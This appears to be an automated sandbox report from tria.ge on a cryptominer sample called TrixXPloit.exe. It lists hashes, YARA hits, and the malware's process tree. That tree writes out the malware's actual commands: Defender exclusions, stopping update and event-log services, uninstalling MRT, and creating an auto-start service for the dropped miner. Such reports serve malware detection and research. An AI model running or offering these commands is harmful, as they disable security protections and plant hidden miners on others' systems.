Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
13/02/2024, 12:58
Static task
static1
Behavioral task
behavioral1
Sample
Launch_this(Not_exe file).bat
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Launch_this(Not_exe file).bat
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
License.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
License.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
TrixXPloit.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
TrixXPloit.exe
Resource
win10v2004-20231215-en
General
-
Target
TrixXPloit.exe
-
Size
2.7MB
-
MD5
115cd2af99e0164e38a30e31f4868f22
-
SHA1
3bb156889b2c85eef03f601c53c9e3f639b776a9
-
SHA256
c880c4b1702d093d6e9bbeb772da0459da2387db9b7b13e95620996e5773db83
-
SHA512
9a609f90eeda49480873e4fab59b6edeaa0ee9c82569ee03d7cb69d968058201cdcaf490418b549b1d16332ed4db0a26fcd61a99c3296fbb3de4c76b10686151
-
SSDEEP
49152:QX6ms1+CBy/+PK+ShRDw+I/SfZlNKfaBT0YA3jgpXSHXRVlCmb5BW:pmssgrPKJfF3wns6XRV8mbH
Malware Config
Signatures
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral5/memory/2960-44-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/2960-43-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/2960-46-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/2960-48-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/2960-47-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/2960-50-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/2960-49-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/2960-51-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral5/memory/2960-52-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts TrixXPloit.exe File created C:\Windows\system32\drivers\etc\hosts Recover.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 2 IoCs
pid Process 468 Process not Found 1628 Recover.exe -
Loads dropped DLL 1 IoCs
pid Process 468 Process not Found -
resource yara_rule behavioral5/memory/2960-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-40-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-41-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-42-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-44-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-43-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-46-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-48-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-47-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-50-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-49-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-51-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral5/memory/2960-52-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe TrixXPloit.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe Recover.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1628 set thread context of 1484 1628 Recover.exe 80 PID 1628 set thread context of 2960 1628 Recover.exe 84 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1040 sc.exe 2656 sc.exe 1064 sc.exe 2832 sc.exe 2032 sc.exe 564 sc.exe 2132 sc.exe 2940 sc.exe 2800 sc.exe 2924 sc.exe 2844 sc.exe 1336 sc.exe 2704 sc.exe 2580 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30195c807c5eda01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2476 TrixXPloit.exe 3040 powershell.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 2476 TrixXPloit.exe 1628 Recover.exe 1256 powershell.exe 1628 Recover.exe 1628 Recover.exe 1628 Recover.exe 1628 Recover.exe 1628 Recover.exe 1628 Recover.exe 1628 Recover.exe 1628 Recover.exe 1628 Recover.exe 1628 Recover.exe 1628 Recover.exe 1628 Recover.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe 2960 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 2476 TrixXPloit.exe Token: SeShutdownPrivilege 2508 powercfg.exe Token: SeShutdownPrivilege 3016 powercfg.exe Token: SeShutdownPrivilege 2688 powercfg.exe Token: SeShutdownPrivilege 2640 powercfg.exe Token: SeDebugPrivilege 1256 powershell.exe Token: SeDebugPrivilege 1628 Recover.exe Token: SeShutdownPrivilege 620 powercfg.exe Token: SeShutdownPrivilege 1512 powercfg.exe Token: SeShutdownPrivilege 1540 powercfg.exe Token: SeShutdownPrivilege 1488 powercfg.exe Token: SeLockMemoryPrivilege 2960 explorer.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2692 wrote to memory of 2888 2692 cmd.exe 36 PID 2692 wrote to memory of 2888 2692 cmd.exe 36 PID 2692 wrote to memory of 2888 2692 cmd.exe 36 PID 756 wrote to memory of 580 756 cmd.exe 68 PID 756 wrote to memory of 580 756 cmd.exe 68 PID 756 wrote to memory of 580 756 cmd.exe 68 PID 1628 wrote to memory of 1484 1628 Recover.exe 80 PID 1628 wrote to memory of 1484 1628 Recover.exe 80 PID 1628 wrote to memory of 1484 1628 Recover.exe 80 PID 1628 wrote to memory of 1484 1628 Recover.exe 80 PID 1628 wrote to memory of 1484 1628 Recover.exe 80 PID 1628 wrote to memory of 1484 1628 Recover.exe 80 PID 1628 wrote to memory of 1484 1628 Recover.exe 80 PID 1628 wrote to memory of 1484 1628 Recover.exe 80 PID 1628 wrote to memory of 1484 1628 Recover.exe 80 PID 1628 wrote to memory of 2960 1628 Recover.exe 84 PID 1628 wrote to memory of 2960 1628 Recover.exe 84 PID 1628 wrote to memory of 2960 1628 Recover.exe 84 PID 1628 wrote to memory of 2960 1628 Recover.exe 84 PID 1628 wrote to memory of 2960 1628 Recover.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\TrixXPloit.exe"C:\Users\Admin\AppData\Local\Temp\TrixXPloit.exe"1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2888
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2940
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2032
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2704
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2580
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "SmartWindows"2⤵
- Launches sc.exe
PID:2844
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "SmartWindows" binpath= "C:\ProgramData\Common\Recover.exe" start= "auto"2⤵
- Launches sc.exe
PID:1040
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:2656
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "SmartWindows"2⤵
- Launches sc.exe
PID:2800
-
-
C:\ProgramData\Common\Recover.exeC:\ProgramData\Common\Recover.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:580
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:564
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1064
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2924
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2132
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1484
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52b19df2da3af86adf584efbddd0d31c0
SHA1f1738910789e169213611c033d83bc9577373686
SHA25658868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA5124a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6
-
Filesize
2.7MB
MD5115cd2af99e0164e38a30e31f4868f22
SHA13bb156889b2c85eef03f601c53c9e3f639b776a9
SHA256c880c4b1702d093d6e9bbeb772da0459da2387db9b7b13e95620996e5773db83
SHA5129a609f90eeda49480873e4fab59b6edeaa0ee9c82569ee03d7cb69d968058201cdcaf490418b549b1d16332ed4db0a26fcd61a99c3296fbb3de4c76b10686151